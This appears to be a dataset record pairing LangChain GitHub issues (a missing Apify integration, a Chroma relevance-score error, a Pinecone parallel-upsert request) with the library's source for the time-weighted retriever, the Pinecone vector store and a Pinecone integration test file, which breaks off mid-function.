"""**Utilities** are the integrations with third-part systems and packages. Other LangChain classes use **Utilities** to interact with third-part systems and packages. """ from langchain.utilities.alpha_vantage import AlphaVantageAPIWrapper from langchain.utilities.arxiv import ArxivAPIWrapper from langchain.utilities.awslambda import LambdaWrapper from langchain.utilities.bash import BashProcess from langchain.utilities.bibtex import BibtexparserWrapper from langchain.utilities.bing_search import BingSearchAPIWrapper from langchain.utilities.brave_search import BraveSearchWrapper from langchain.utilities.duckduckgo_search import DuckDuckGoSearchAPIWrapper from langchain.utilities.golden_query import GoldenQueryAPIWrapper from langchain.utilities.google_places_api import GooglePlacesAPIWrapper from langchain.utilities.google_search import GoogleSearchAPIWrapper from langchain.utilities.google_serper import GoogleSerperAPIWrapper from langchain.utilities.graphql import GraphQLAPIWrapper from langchain.utilities.jira import JiraAPIWrapper from langchain.utilities.max_compute import MaxComputeAPIWrapper from langchain.utilities.metaphor_search import MetaphorSearchAPIWrapper from langchain.utilities.openweathermap import OpenWeatherMapAPIWrapper from langchain.utilities.portkey import Portkey from langchain.utilities.powerbi import PowerBIDataset from langchain.utilities.pubmed import PubMedAPIWrapper from langchain.utilities.python import PythonREPL from langchain.utilities.requests import Requests, RequestsWrapper, TextRequestsWrapper from langchain.utilities.scenexplain import SceneXplainAPIWrapper from langchain.utilities.searx_search import SearxSearchWrapper from langchain.utilities.serpapi import SerpAPIWrapper from langchain.utilities.spark_sql import SparkSQL from langchain.utilities.sql_database import SQLDatabase from langchain.utilities.tensorflow_datasets import TensorflowDatasets from langchain.utilities.twilio import TwilioAPIWrapper from langchain.utilities.wikipedia import WikipediaAPIWrapper from langchain.utilities.wolfram_alpha import WolframAlphaAPIWrapper from langchain.utilities.zapier import ZapierNLAWrapper __all__ = [ "AlphaVantageAPIWrapper", "ArxivAPIWrapper", "BashProcess", "BibtexparserWrapper", "BingSearchAPIWrapper", "BraveSearchWrapper", "DuckDuckGoSearchAPIWrapper", "GoldenQueryAPIWrapper", "GooglePlacesAPIWrapper", "GoogleSearchAPIWrapper", "GoogleSerperAPIWrapper", "GraphQLAPIWrapper", "JiraAPIWrapper", "LambdaWrapper", "MaxComputeAPIWrapper", "MetaphorSearchAPIWrapper", "OpenWeatherMapAPIWrapper", "Portkey", "PowerBIDataset", "PubMedAPIWrapper", "PythonREPL", "Requests", "RequestsWrapper", "SQLDatabase", "SceneXplainAPIWrapper", "SearxSearchWrapper", "SerpAPIWrapper", "SparkSQL", "TensorflowDatasets", "TextRequestsWrapper", "TextRequestsWrapper", "TwilioAPIWrapper", "WikipediaAPIWrapper", "WolframAlphaAPIWrapper", "ZapierNLAWrapper", ]
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,201
DOC: Apify integration missing
### Issue with current documentation: The Apify integration has been deleted by @hwchase17 in commit aa0e69bc98fa9c77b01e5104f12b2b779f64fd33, and thus this documentation is no longer valid: https://python.langchain.com/docs/integrations/tools/apify ### Idea or request for content: It would be highly beneficial to have information on a suitable replacement for the Apify integration.
https://github.com/langchain-ai/langchain/issues/8201
https://github.com/langchain-ai/langchain/pull/10067
02e51f4217207eed4fc9ac89735cf1f660be3f10
86646ec555970e01130994dc75f3a0c5d4e52de9
"2023-07-24T19:46:13Z"
python
"2023-08-31T22:47:44Z"
libs/langchain/langchain/utilities/apify.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
3,685
TimeWeightedVectorStoreRetriever (TWVSR) and ChromaDb vector store - base.py
Hi there. I realise there is a lot happening, and this looks to be something that has been missed. When trying to use TWVSR with ChromaDb it errors because `_similarity_search_with_relevance_scores` is not implemented inside of base.py: `def _similarity_search_with_relevance_scores( self, query: str, k: int = 4, **kwargs: Any, ) -> List[Tuple[Document, float]]: """Return docs and relevance scores, normalized on a scale from 0 to 1. 0 is dissimilar, 1 is most similar. """ raise NotImplementedError` Trying to make a work-around now; a sketch of one possibility follows below. Many thanks Ian
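One possible shape for the work-around mentioned above: subclass `Chroma` and supply the missing hook by mapping the distances that `similarity_search_with_score` already returns onto a 0-1 relevance scale. A minimal sketch, assuming cosine-style distances where smaller means closer; this is not the fix that eventually landed:

```python
from typing import Any, List, Tuple

from langchain.docstore.document import Document
from langchain.vectorstores import Chroma


class ChromaWithRelevance(Chroma):
    def _similarity_search_with_relevance_scores(
        self, query: str, k: int = 4, **kwargs: Any
    ) -> List[Tuple[Document, float]]:
        # Chroma returns raw distances; convert to a 0-1 relevance score
        # where 1 means most similar, clamping at 0 for distant results.
        docs_and_distances = self.similarity_search_with_score(query, k=k, **kwargs)
        return [
            (doc, max(0.0, 1.0 - distance)) for doc, distance in docs_and_distances
        ]
```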
https://github.com/langchain-ai/langchain/issues/3685
https://github.com/langchain-ai/langchain/pull/9906
bc8cceebf7b2d8e056b905926a6009367b6a8b14
4dc47bd3acc8928359773fc3fb80d289b9eae55e
"2023-04-28T00:16:05Z"
python
"2023-09-03T22:05:30Z"
libs/langchain/langchain/retrievers/time_weighted_retriever.py
import datetime
from copy import deepcopy
from typing import Any, Dict, List, Optional, Tuple

from langchain.callbacks.manager import CallbackManagerForRetrieverRun
from langchain.pydantic_v1 import Field
from langchain.schema import BaseRetriever, Document
from langchain.vectorstores.base import VectorStore


def _get_hours_passed(time: datetime.datetime, ref_time: datetime.datetime) -> float:
    """Get the hours passed between two datetimes."""
    return (time - ref_time).total_seconds() / 3600


class TimeWeightedVectorStoreRetriever(BaseRetriever):
    """Retriever that combines embedding similarity with
    recency in retrieving values."""

    vectorstore: VectorStore
    """The vectorstore to store documents and determine salience."""

    search_kwargs: dict = Field(default_factory=lambda: dict(k=100))
    """Keyword arguments to pass to the vectorstore similarity search."""

    # TODO: abstract as a queue
    memory_stream: List[Document] = Field(default_factory=list)
    """The memory_stream of documents to search through."""

    decay_rate: float = Field(default=0.01)
    """The exponential decay factor used as (1.0-decay_rate)**(hrs_passed)."""

    k: int = 4
    """The maximum number of documents to retrieve in a given call."""

    other_score_keys: List[str] = []
    """Other keys in the metadata to factor into the score, e.g. 'importance'."""

    default_salience: Optional[float] = None
    """The salience to assign memories not retrieved from the vector store.

    None assigns no salience to documents not fetched from the vector store.
    """

    class Config:
        """Configuration for this pydantic object."""

        arbitrary_types_allowed = True

    def _get_combined_score(
        self,
        document: Document,
        vector_relevance: Optional[float],
        current_time: datetime.datetime,
    ) -> float:
        """Return the combined score for a document."""
        hours_passed = _get_hours_passed(
            current_time,
            document.metadata["last_accessed_at"],
        )
        score = (1.0 - self.decay_rate) ** hours_passed
        for key in self.other_score_keys:
            if key in document.metadata:
                score += document.metadata[key]
        if vector_relevance is not None:
            score += vector_relevance
        return score

    def get_salient_docs(self, query: str) -> Dict[int, Tuple[Document, float]]:
        """Return documents that are salient to the query."""
        docs_and_scores: List[Tuple[Document, float]]
        docs_and_scores = self.vectorstore.similarity_search_with_relevance_scores(
            query, **self.search_kwargs
        )
        results = {}
        for fetched_doc, relevance in docs_and_scores:
            if "buffer_idx" in fetched_doc.metadata:
                buffer_idx = fetched_doc.metadata["buffer_idx"]
                doc = self.memory_stream[buffer_idx]
                results[buffer_idx] = (doc, relevance)
        return results

    def _get_relevant_documents(
        self, query: str, *, run_manager: CallbackManagerForRetrieverRun
    ) -> List[Document]:
        """Return documents that are relevant to the query."""
        current_time = datetime.datetime.now()
        docs_and_scores = {
            doc.metadata["buffer_idx"]: (doc, self.default_salience)
            for doc in self.memory_stream[-self.k :]
        }
        # If a doc is considered salient, update the salience score
        docs_and_scores.update(self.get_salient_docs(query))
        rescored_docs = [
            (doc, self._get_combined_score(doc, relevance, current_time))
            for doc, relevance in docs_and_scores.values()
        ]
        rescored_docs.sort(key=lambda x: x[1], reverse=True)
        result = []
        # Ensure frequently accessed memories aren't forgotten
        for doc, _ in rescored_docs[: self.k]:
            # TODO: Update vector store doc once `update` method is exposed.
            buffered_doc = self.memory_stream[doc.metadata["buffer_idx"]]
            buffered_doc.metadata["last_accessed_at"] = current_time
            result.append(buffered_doc)
        return result

    def add_documents(self, documents: List[Document], **kwargs: Any) -> List[str]:
        """Add documents to vectorstore."""
        current_time = kwargs.get("current_time")
        if current_time is None:
            current_time = datetime.datetime.now()
        # Avoid mutating input documents
        dup_docs = [deepcopy(d) for d in documents]
        for i, doc in enumerate(dup_docs):
            if "last_accessed_at" not in doc.metadata:
                doc.metadata["last_accessed_at"] = current_time
            if "created_at" not in doc.metadata:
                doc.metadata["created_at"] = current_time
            doc.metadata["buffer_idx"] = len(self.memory_stream) + i
        self.memory_stream.extend(dup_docs)
        return self.vectorstore.add_documents(dup_docs, **kwargs)

    async def aadd_documents(
        self, documents: List[Document], **kwargs: Any
    ) -> List[str]:
        """Add documents to vectorstore."""
        current_time = kwargs.get("current_time")
        if current_time is None:
            current_time = datetime.datetime.now()
        # Avoid mutating input documents
        dup_docs = [deepcopy(d) for d in documents]
        for i, doc in enumerate(dup_docs):
            if "last_accessed_at" not in doc.metadata:
                doc.metadata["last_accessed_at"] = current_time
            if "created_at" not in doc.metadata:
                doc.metadata["created_at"] = current_time
            doc.metadata["buffer_idx"] = len(self.memory_stream) + i
        self.memory_stream.extend(dup_docs)
        return await self.vectorstore.aadd_documents(dup_docs, **kwargs)
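For orientation, a minimal usage sketch of the retriever above against a vector store that does implement relevance scores. Assumptions: `faiss-cpu` is installed, an OpenAI key is configured, and 1536 is the OpenAI embedding width:

```python
import faiss

from langchain.docstore import InMemoryDocstore
from langchain.embeddings import OpenAIEmbeddings
from langchain.retrievers import TimeWeightedVectorStoreRetriever
from langchain.schema import Document
from langchain.vectorstores import FAISS

embeddings_model = OpenAIEmbeddings()
# Empty FAISS index sized to the embedding width
index = faiss.IndexFlatL2(1536)
vectorstore = FAISS(embeddings_model.embed_query, index, InMemoryDocstore({}), {})
retriever = TimeWeightedVectorStoreRetriever(
    vectorstore=vectorstore, decay_rate=0.01, k=1
)
retriever.add_documents([Document(page_content="hello world")])
# Recency and similarity are combined into one ranking score
print(retriever.get_relevant_documents("hello world"))
```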
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
9,855
Support index upsert parallelization for pinecone
### Feature request We can take advantage of pinecone's parallel upsert (see example: https://docs.pinecone.io/docs/insert-data#sending-upserts-in-parallel). This will require modification of the current `from_texts` pipeline to 1. Create a batch (chunk) for doing embeddings (i.e. have a chunk size of 1000 for embeddings) 2. Perform a parallel upsert to the Pinecone index on that chunk This way we are in control of 3 things: 1. Thread pool for the pinecone index 2. Parametrize the batch size for embeddings (i.e. it helps to avoid the rate limit for OpenAI embeddings) 3. Parametrize the batch size for upsert (it helps to avoid throttling of the pinecone API) As a part of this ticket, we can consolidate the code between `add_texts` and `from_texts`, as they are doing a similar thing. ### Motivation The functions `from_texts` and `add_texts` for index upsert don't take advantage of parallelism, especially when embeddings are calculated by HTTP calls (i.e. OpenAI embeddings). This makes the whole sequence inefficient from an IO-bound standpoint, as the pipeline is the following: 1. Take a small batch, i.e. 32/64, of documents 2. Calculate embeddings --> WAIT 3. Upsert a batch --> WAIT We can benefit from either parallel upsert or we can utilize `asyncio`. ### Your contribution I will do it.
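A sketch of the parallel-upsert pattern from the linked Pinecone docs, as it might apply here. The dummy `vectors` list, index name, batch size of 100, and thread-pool size of 30 are assumptions for illustration:

```python
import itertools

import pinecone

pinecone.init(api_key="...", environment="...")


def chunks(iterable, batch_size=100):
    """Break an iterable into chunks of length batch_size."""
    it = iter(iterable)
    chunk = tuple(itertools.islice(it, batch_size))
    while chunk:
        yield chunk
        chunk = tuple(itertools.islice(it, batch_size))


# Dummy data standing in for (id, embedding, metadata) tuples
vectors = [(str(i), [0.1] * 1536, {}) for i in range(1000)]

# pool_threads sizes the client-side thread pool used for parallel requests
with pinecone.Index("langchain-demo", pool_threads=30) as index:
    # Fire off all upserts in parallel; async_req returns future-like results
    async_results = [
        index.upsert(vectors=list(chunk), async_req=True)
        for chunk in chunks(vectors, batch_size=100)
    ]
    # Wait for and retrieve responses (raises in case of error)
    [async_result.get() for async_result in async_results]
```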
https://github.com/langchain-ai/langchain/issues/9855
https://github.com/langchain-ai/langchain/pull/9859
16a27ab244e6b92d74c48c206e0e6f1b5d00e126
4765c097035b9ff722fa9bbb7c3dd4eb6aed933c
"2023-08-28T13:09:29Z"
python
"2023-09-03T22:37:41Z"
libs/langchain/langchain/vectorstores/pinecone.py
from __future__ import annotations

import logging
import uuid
import warnings
from typing import Any, Callable, Iterable, List, Optional, Tuple, Union

import numpy as np

from langchain.docstore.document import Document
from langchain.embeddings.base import Embeddings
from langchain.vectorstores.base import VectorStore
from langchain.vectorstores.utils import DistanceStrategy, maximal_marginal_relevance

logger = logging.getLogger(__name__)


class Pinecone(VectorStore):
    """`Pinecone` vector store.

    To use, you should have the ``pinecone-client`` python package installed.

    Example:
        .. code-block:: python

            from langchain.vectorstores import Pinecone
            from langchain.embeddings.openai import OpenAIEmbeddings
            import pinecone

            # The environment should be the one specified next to the API key
            # in your Pinecone console
            pinecone.init(api_key="***", environment="...")
            index = pinecone.Index("langchain-demo")
            embeddings = OpenAIEmbeddings()
            vectorstore = Pinecone(index, embeddings.embed_query, "text")
    """

    def __init__(
        self,
        index: Any,
        embedding: Union[Embeddings, Callable],
        text_key: str,
        namespace: Optional[str] = None,
        distance_strategy: Optional[DistanceStrategy] = DistanceStrategy.COSINE,
    ):
        """Initialize with Pinecone client."""
        try:
            import pinecone
        except ImportError:
            raise ImportError(
                "Could not import pinecone python package. "
                "Please install it with `pip install pinecone-client`."
            )
        if not isinstance(index, pinecone.index.Index):
            raise ValueError(
                f"client should be an instance of pinecone.index.Index, "
                f"got {type(index)}"
            )
        if not isinstance(embedding, Embeddings):
            warnings.warn(
                "Passing in `embedding` as a Callable is deprecated. Please pass in an"
                " Embeddings object instead."
            )
        self._index = index
        self._embedding = embedding
        self._text_key = text_key
        self._namespace = namespace
        self.distance_strategy = distance_strategy

    @property
    def embeddings(self) -> Optional[Embeddings]:
        """Access the query embedding object if available."""
        if isinstance(self._embedding, Embeddings):
            return self._embedding
        return None

    def _embed_documents(self, texts: Iterable[str]) -> List[List[float]]:
        """Embed search docs."""
        if isinstance(self._embedding, Embeddings):
            return self._embedding.embed_documents(list(texts))
        return [self._embedding(t) for t in texts]

    def _embed_query(self, text: str) -> List[float]:
        """Embed query text."""
        if isinstance(self._embedding, Embeddings):
            return self._embedding.embed_query(text)
        return self._embedding(text)

    def add_texts(
        self,
        texts: Iterable[str],
        metadatas: Optional[List[dict]] = None,
        ids: Optional[List[str]] = None,
        namespace: Optional[str] = None,
        batch_size: int = 32,
        **kwargs: Any,
    ) -> List[str]:
        """Run more texts through the embeddings and add to the vectorstore.

        Args:
            texts: Iterable of strings to add to the vectorstore.
            metadatas: Optional list of metadatas associated with the texts.
            ids: Optional list of ids to associate with the texts.
            namespace: Optional pinecone namespace to add the texts to.

        Returns:
            List of ids from adding the texts into the vectorstore.

        """
        if namespace is None:
            namespace = self._namespace
        # Embed and create the documents
        docs = []
        ids = ids or [str(uuid.uuid4()) for _ in texts]
        embeddings = self._embed_documents(texts)
        for i, (text, embedding) in enumerate(zip(texts, embeddings)):
            metadata = metadatas[i] if metadatas else {}
            metadata[self._text_key] = text
            docs.append((ids[i], embedding, metadata))
        # upsert to Pinecone
        self._index.upsert(
            vectors=docs, namespace=namespace, batch_size=batch_size, **kwargs
        )
        return ids

    def similarity_search_with_score(
        self,
        query: str,
        k: int = 4,
        filter: Optional[dict] = None,
        namespace: Optional[str] = None,
    ) -> List[Tuple[Document, float]]:
        """Return pinecone documents most similar to query, along with scores.

        Args:
            query: Text to look up documents similar to.
            k: Number of Documents to return. Defaults to 4.
            filter: Dictionary of argument(s) to filter on metadata
            namespace: Namespace to search in. Default will search in '' namespace.

        Returns:
            List of Documents most similar to the query and score for each
        """
        return self.similarity_search_by_vector_with_score(
            self._embed_query(query), k=k, filter=filter, namespace=namespace
        )

    def similarity_search_by_vector_with_score(
        self,
        embedding: List[float],
        *,
        k: int = 4,
        filter: Optional[dict] = None,
        namespace: Optional[str] = None,
    ) -> List[Tuple[Document, float]]:
        """Return pinecone documents most similar to embedding, along with scores."""

        if namespace is None:
            namespace = self._namespace
        docs = []
        results = self._index.query(
            [embedding],
            top_k=k,
            include_metadata=True,
            namespace=namespace,
            filter=filter,
        )
        for res in results["matches"]:
            metadata = res["metadata"]
            if self._text_key in metadata:
                text = metadata.pop(self._text_key)
                score = res["score"]
                docs.append((Document(page_content=text, metadata=metadata), score))
            else:
                logger.warning(
                    f"Found document with no `{self._text_key}` key. Skipping."
                )
        return docs

    def similarity_search(
        self,
        query: str,
        k: int = 4,
        filter: Optional[dict] = None,
        namespace: Optional[str] = None,
        **kwargs: Any,
    ) -> List[Document]:
        """Return pinecone documents most similar to query.

        Args:
            query: Text to look up documents similar to.
            k: Number of Documents to return. Defaults to 4.
            filter: Dictionary of argument(s) to filter on metadata
            namespace: Namespace to search in. Default will search in '' namespace.

        Returns:
            List of Documents most similar to the query and score for each
        """
        docs_and_scores = self.similarity_search_with_score(
            query, k=k, filter=filter, namespace=namespace, **kwargs
        )
        return [doc for doc, _ in docs_and_scores]

    def _select_relevance_score_fn(self) -> Callable[[float], float]:
        """
        The 'correct' relevance function
        may differ depending on a few things, including:
        - the distance / similarity metric used by the VectorStore
        - the scale of your embeddings (OpenAI's are unit normed. Many others are not!)
        - embedding dimensionality
        - etc.
        """

        if self.distance_strategy == DistanceStrategy.COSINE:
            return self._cosine_relevance_score_fn
        elif self.distance_strategy == DistanceStrategy.MAX_INNER_PRODUCT:
            return self._max_inner_product_relevance_score_fn
        elif self.distance_strategy == DistanceStrategy.EUCLIDEAN_DISTANCE:
            return self._euclidean_relevance_score_fn
        else:
            raise ValueError(
                "Unknown distance strategy, must be cosine, max_inner_product "
                "(dot product), or euclidean"
            )

    def max_marginal_relevance_search_by_vector(
        self,
        embedding: List[float],
        k: int = 4,
        fetch_k: int = 20,
        lambda_mult: float = 0.5,
        filter: Optional[dict] = None,
        namespace: Optional[str] = None,
        **kwargs: Any,
    ) -> List[Document]:
        """Return docs selected using the maximal marginal relevance.

        Maximal marginal relevance optimizes for similarity to query AND diversity
        among selected documents.

        Args:
            embedding: Embedding to look up documents similar to.
            k: Number of Documents to return. Defaults to 4.
            fetch_k: Number of Documents to fetch to pass to MMR algorithm.
            lambda_mult: Number between 0 and 1 that determines the degree
                        of diversity among the results with 0 corresponding
                        to maximum diversity and 1 to minimum diversity.
                        Defaults to 0.5.
        Returns:
            List of Documents selected by maximal marginal relevance.
        """
        if namespace is None:
            namespace = self._namespace
        results = self._index.query(
            [embedding],
            top_k=fetch_k,
            include_values=True,
            include_metadata=True,
            namespace=namespace,
            filter=filter,
        )
        mmr_selected = maximal_marginal_relevance(
            np.array([embedding], dtype=np.float32),
            [item["values"] for item in results["matches"]],
            k=k,
            lambda_mult=lambda_mult,
        )
        selected = [results["matches"][i]["metadata"] for i in mmr_selected]
        return [
            Document(page_content=metadata.pop((self._text_key)), metadata=metadata)
            for metadata in selected
        ]

    def max_marginal_relevance_search(
        self,
        query: str,
        k: int = 4,
        fetch_k: int = 20,
        lambda_mult: float = 0.5,
        filter: Optional[dict] = None,
        namespace: Optional[str] = None,
        **kwargs: Any,
    ) -> List[Document]:
        """Return docs selected using the maximal marginal relevance.

        Maximal marginal relevance optimizes for similarity to query AND diversity
        among selected documents.

        Args:
            query: Text to look up documents similar to.
            k: Number of Documents to return. Defaults to 4.
            fetch_k: Number of Documents to fetch to pass to MMR algorithm.
            lambda_mult: Number between 0 and 1 that determines the degree
                        of diversity among the results with 0 corresponding
                        to maximum diversity and 1 to minimum diversity.
                        Defaults to 0.5.
        Returns:
            List of Documents selected by maximal marginal relevance.
        """
        embedding = self._embed_query(query)
        return self.max_marginal_relevance_search_by_vector(
            embedding, k, fetch_k, lambda_mult, filter, namespace
        )

    @classmethod
    def from_texts(
        cls,
        texts: List[str],
        embedding: Embeddings,
        metadatas: Optional[List[dict]] = None,
        ids: Optional[List[str]] = None,
        batch_size: int = 32,
        text_key: str = "text",
        index_name: Optional[str] = None,
        namespace: Optional[str] = None,
        upsert_kwargs: Optional[dict] = None,
        **kwargs: Any,
    ) -> Pinecone:
        """Construct Pinecone wrapper from raw documents.

        This is a user friendly interface that:
            1. Embeds documents.
            2. Adds the documents to a provided Pinecone index

        This is intended to be a quick way to get started.

        Example:
            .. code-block:: python

                from langchain import Pinecone
                from langchain.embeddings import OpenAIEmbeddings
                import pinecone

                # The environment should be the one specified next to the API key
                # in your Pinecone console
                pinecone.init(api_key="***", environment="...")
                embeddings = OpenAIEmbeddings()
                pinecone = Pinecone.from_texts(
                    texts,
                    embeddings,
                    index_name="langchain-demo"
                )
        """
        try:
            import pinecone
        except ImportError:
            raise ValueError(
                "Could not import pinecone python package. "
                "Please install it with `pip install pinecone-client`."
            )

        indexes = pinecone.list_indexes()  # checks if provided index exists

        if index_name in indexes:
            index = pinecone.Index(index_name)
        elif len(indexes) == 0:
            raise ValueError(
                "No active indexes found in your Pinecone project, "
                "are you sure you're using the right API key and environment?"
            )
        else:
            raise ValueError(
                f"Index '{index_name}' not found in your Pinecone project. "
                f"Did you mean one of the following indexes: {', '.join(indexes)}"
            )

        for i in range(0, len(texts), batch_size):
            # set end position of batch
            i_end = min(i + batch_size, len(texts))
            # get batch of texts and ids
            lines_batch = texts[i:i_end]
            # create ids if not provided
            if ids:
                ids_batch = ids[i:i_end]
            else:
                ids_batch = [str(uuid.uuid4()) for n in range(i, i_end)]
            # create embeddings
            embeds = embedding.embed_documents(lines_batch)
            # prep metadata and upsert batch
            if metadatas:
                metadata = metadatas[i:i_end]
            else:
                metadata = [{} for _ in range(i, i_end)]
            for j, line in enumerate(lines_batch):
                metadata[j][text_key] = line
            to_upsert = zip(ids_batch, embeds, metadata)

            # upsert to Pinecone
            _upsert_kwargs = upsert_kwargs or {}
            index.upsert(
                vectors=list(to_upsert), namespace=namespace, **_upsert_kwargs
            )
        return cls(index, embedding, text_key, namespace, **kwargs)

    @classmethod
    def from_existing_index(
        cls,
        index_name: str,
        embedding: Embeddings,
        text_key: str = "text",
        namespace: Optional[str] = None,
    ) -> Pinecone:
        """Load pinecone vectorstore from index name."""
        try:
            import pinecone
        except ImportError:
            raise ValueError(
                "Could not import pinecone python package. "
                "Please install it with `pip install pinecone-client`."
            )

        return cls(pinecone.Index(index_name), embedding, text_key, namespace)

    def delete(
        self,
        ids: Optional[List[str]] = None,
        delete_all: Optional[bool] = None,
        namespace: Optional[str] = None,
        filter: Optional[dict] = None,
        **kwargs: Any,
    ) -> None:
        """Delete by vector IDs or filter.

        Args:
            ids: List of ids to delete.
            filter: Dictionary of conditions to filter vectors to delete.
        """

        if namespace is None:
            namespace = self._namespace

        if delete_all:
            self._index.delete(delete_all=True, namespace=namespace, **kwargs)
        elif ids is not None:
            chunk_size = 1000
            for i in range(0, len(ids), chunk_size):
                chunk = ids[i : i + chunk_size]
                self._index.delete(ids=chunk, namespace=namespace, **kwargs)
        elif filter is not None:
            self._index.delete(filter=filter, namespace=namespace, **kwargs)
        else:
            raise ValueError("Either ids, delete_all, or filter must be provided.")

        return None
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
9,855
Support index upsert parallelization for pinecone
### Feature request We can take advantage of pinecone's parallel upsert (see example: https://docs.pinecone.io/docs/insert-data#sending-upserts-in-parallel). This will require modification of the current `from_texts` pipeline to 1. Create a batch (chunk) for doing embeddings (i.e. have a chunk size of 1000 for embeddings) 2. Perform a parallel upsert to the Pinecone index on that chunk This way we are in control of 3 things: 1. Thread pool for the pinecone index 2. Parametrize the batch size for embeddings (i.e. it helps to avoid the rate limit for OpenAI embeddings) 3. Parametrize the batch size for upsert (it helps to avoid throttling of the pinecone API) As a part of this ticket, we can consolidate the code between `add_texts` and `from_texts`, as they are doing a similar thing. ### Motivation The functions `from_texts` and `add_texts` for index upsert don't take advantage of parallelism, especially when embeddings are calculated by HTTP calls (i.e. OpenAI embeddings). This makes the whole sequence inefficient from an IO-bound standpoint, as the pipeline is the following: 1. Take a small batch, i.e. 32/64, of documents 2. Calculate embeddings --> WAIT 3. Upsert a batch --> WAIT We can benefit from either parallel upsert or we can utilize `asyncio`. ### Your contribution I will do it.
https://github.com/langchain-ai/langchain/issues/9855
https://github.com/langchain-ai/langchain/pull/9859
16a27ab244e6b92d74c48c206e0e6f1b5d00e126
4765c097035b9ff722fa9bbb7c3dd4eb6aed933c
"2023-08-28T13:09:29Z"
python
"2023-09-03T22:37:41Z"
libs/langchain/tests/integration_tests/vectorstores/test_pinecone.py
import importlib
import os
import time
import uuid
from typing import TYPE_CHECKING, List

import numpy as np
import pytest

from langchain.docstore.document import Document
from langchain.embeddings import OpenAIEmbeddings
from langchain.vectorstores.pinecone import Pinecone

if TYPE_CHECKING:
    import pinecone

index_name = "langchain-test-index"  # name of the index
namespace_name = "langchain-test-namespace"  # name of the namespace
dimension = 1536  # dimension of the embeddings


def reset_pinecone() -> None:
    assert os.environ.get("PINECONE_API_KEY") is not None
    assert os.environ.get("PINECONE_ENVIRONMENT") is not None

    import pinecone

    importlib.reload(pinecone)

    pinecone.init(
        api_key=os.environ.get("PINECONE_API_KEY"),
        environment=os.environ.get("PINECONE_ENVIRONMENT"),
    )


class TestPinecone:
    index: "pinecone.Index"

    @classmethod
    def setup_class(cls) -> None:
        import pinecone

        reset_pinecone()

        cls.index = pinecone.Index(index_name)

        if index_name in pinecone.list_indexes():
            index_stats = cls.index.describe_index_stats()
            if index_stats["dimension"] == dimension:
                # delete all the vectors in the index if the dimension is the same
                # from all namespaces
                index_stats = cls.index.describe_index_stats()
                for _namespace_name in index_stats["namespaces"].keys():
                    cls.index.delete(delete_all=True, namespace=_namespace_name)
            else:
                pinecone.delete_index(index_name)
                pinecone.create_index(name=index_name, dimension=dimension)
        else:
            pinecone.create_index(name=index_name, dimension=dimension)

        # ensure the index is empty
        index_stats = cls.index.describe_index_stats()
        assert index_stats["dimension"] == dimension
        if index_stats["namespaces"].get(namespace_name) is not None:
            assert index_stats["namespaces"][namespace_name]["vector_count"] == 0

    @classmethod
    def teardown_class(cls) -> None:
        index_stats = cls.index.describe_index_stats()
        for _namespace_name in index_stats["namespaces"].keys():
            cls.index.delete(delete_all=True, namespace=_namespace_name)

        reset_pinecone()

    @pytest.fixture(autouse=True)
    def setup(self) -> None:
        # delete all the vectors in the index
        index_stats = self.index.describe_index_stats()
        for _namespace_name in index_stats["namespaces"].keys():
            self.index.delete(delete_all=True, namespace=_namespace_name)

        reset_pinecone()

    @pytest.mark.vcr()
    def test_from_texts(
        self, texts: List[str], embedding_openai: OpenAIEmbeddings
    ) -> None:
        """Test end to end construction and search."""
        unique_id = uuid.uuid4().hex
        needs = f"foobuu {unique_id} booo"
        texts.insert(0, needs)

        docsearch = Pinecone.from_texts(
            texts=texts,
            embedding=embedding_openai,
            index_name=index_name,
            namespace=namespace_name,
        )
        output = docsearch.similarity_search(unique_id, k=1, namespace=namespace_name)
        assert output == [Document(page_content=needs)]

    @pytest.mark.vcr()
    def test_from_texts_with_metadatas(
        self, texts: List[str], embedding_openai: OpenAIEmbeddings
    ) -> None:
        """Test end to end construction and search."""

        unique_id = uuid.uuid4().hex
        needs = f"foobuu {unique_id} booo"
        texts.insert(0, needs)

        metadatas = [{"page": i} for i in range(len(texts))]
        docsearch = Pinecone.from_texts(
            texts,
            embedding_openai,
            index_name=index_name,
            metadatas=metadatas,
            namespace=namespace_name,
        )
        output = docsearch.similarity_search(needs, k=1, namespace=namespace_name)

        # TODO: why metadata={"page": 0.0}) instead of {"page": 0}?
        assert output == [Document(page_content=needs, metadata={"page": 0.0})]

    @pytest.mark.vcr()
    def test_from_texts_with_scores(self, embedding_openai: OpenAIEmbeddings) -> None:
        """Test end to end construction and search with scores and IDs."""
        texts = ["foo", "bar", "baz"]
        metadatas = [{"page": i} for i in range(len(texts))]
        docsearch = Pinecone.from_texts(
            texts,
            embedding_openai,
            index_name=index_name,
            metadatas=metadatas,
            namespace=namespace_name,
        )
        output = docsearch.similarity_search_with_score(
            "foo", k=3, namespace=namespace_name
        )
        docs = [o[0] for o in output]
        scores = [o[1] for o in output]
        sorted_documents = sorted(docs, key=lambda x: x.metadata["page"])

        # TODO: why metadata={"page": 0.0}) instead of {"page": 0}, etc???
        assert sorted_documents == [
            Document(page_content="foo", metadata={"page": 0.0}),
            Document(page_content="bar", metadata={"page": 1.0}),
            Document(page_content="baz", metadata={"page": 2.0}),
        ]
        assert scores[0] > scores[1] > scores[2]

    def test_from_existing_index_with_namespaces(
        self, embedding_openai: OpenAIEmbeddings
    ) -> None:
        """Test that namespaces are properly handled."""
        # Create two indexes with the same name but different namespaces
        texts_1 = ["foo", "bar", "baz"]
        metadatas = [{"page": i} for i in range(len(texts_1))]
        Pinecone.from_texts(
            texts_1,
            embedding_openai,
            index_name=index_name,
            metadatas=metadatas,
            namespace=f"{index_name}-1",
        )

        texts_2 = ["foo2", "bar2", "baz2"]
        metadatas = [{"page": i} for i in range(len(texts_2))]

        Pinecone.from_texts(
            texts_2,
            embedding_openai,
            index_name=index_name,
            metadatas=metadatas,
            namespace=f"{index_name}-2",
        )

        # Search with namespace
        docsearch = Pinecone.from_existing_index(
            index_name=index_name,
            embedding=embedding_openai,
            namespace=f"{index_name}-1",
        )
        output = docsearch.similarity_search("foo", k=20, namespace=f"{index_name}-1")
        # check that we don't get results from the other namespace
        page_contents = sorted(set([o.page_content for o in output]))
        assert all(content in ["foo", "bar", "baz"] for content in page_contents)
        assert all(content not in ["foo2", "bar2", "baz2"] for content in page_contents)

    def test_add_documents_with_ids(
        self, texts: List[str], embedding_openai: OpenAIEmbeddings
    ) -> None:
        ids = [uuid.uuid4().hex for _ in range(len(texts))]
        Pinecone.from_texts(
            texts=texts,
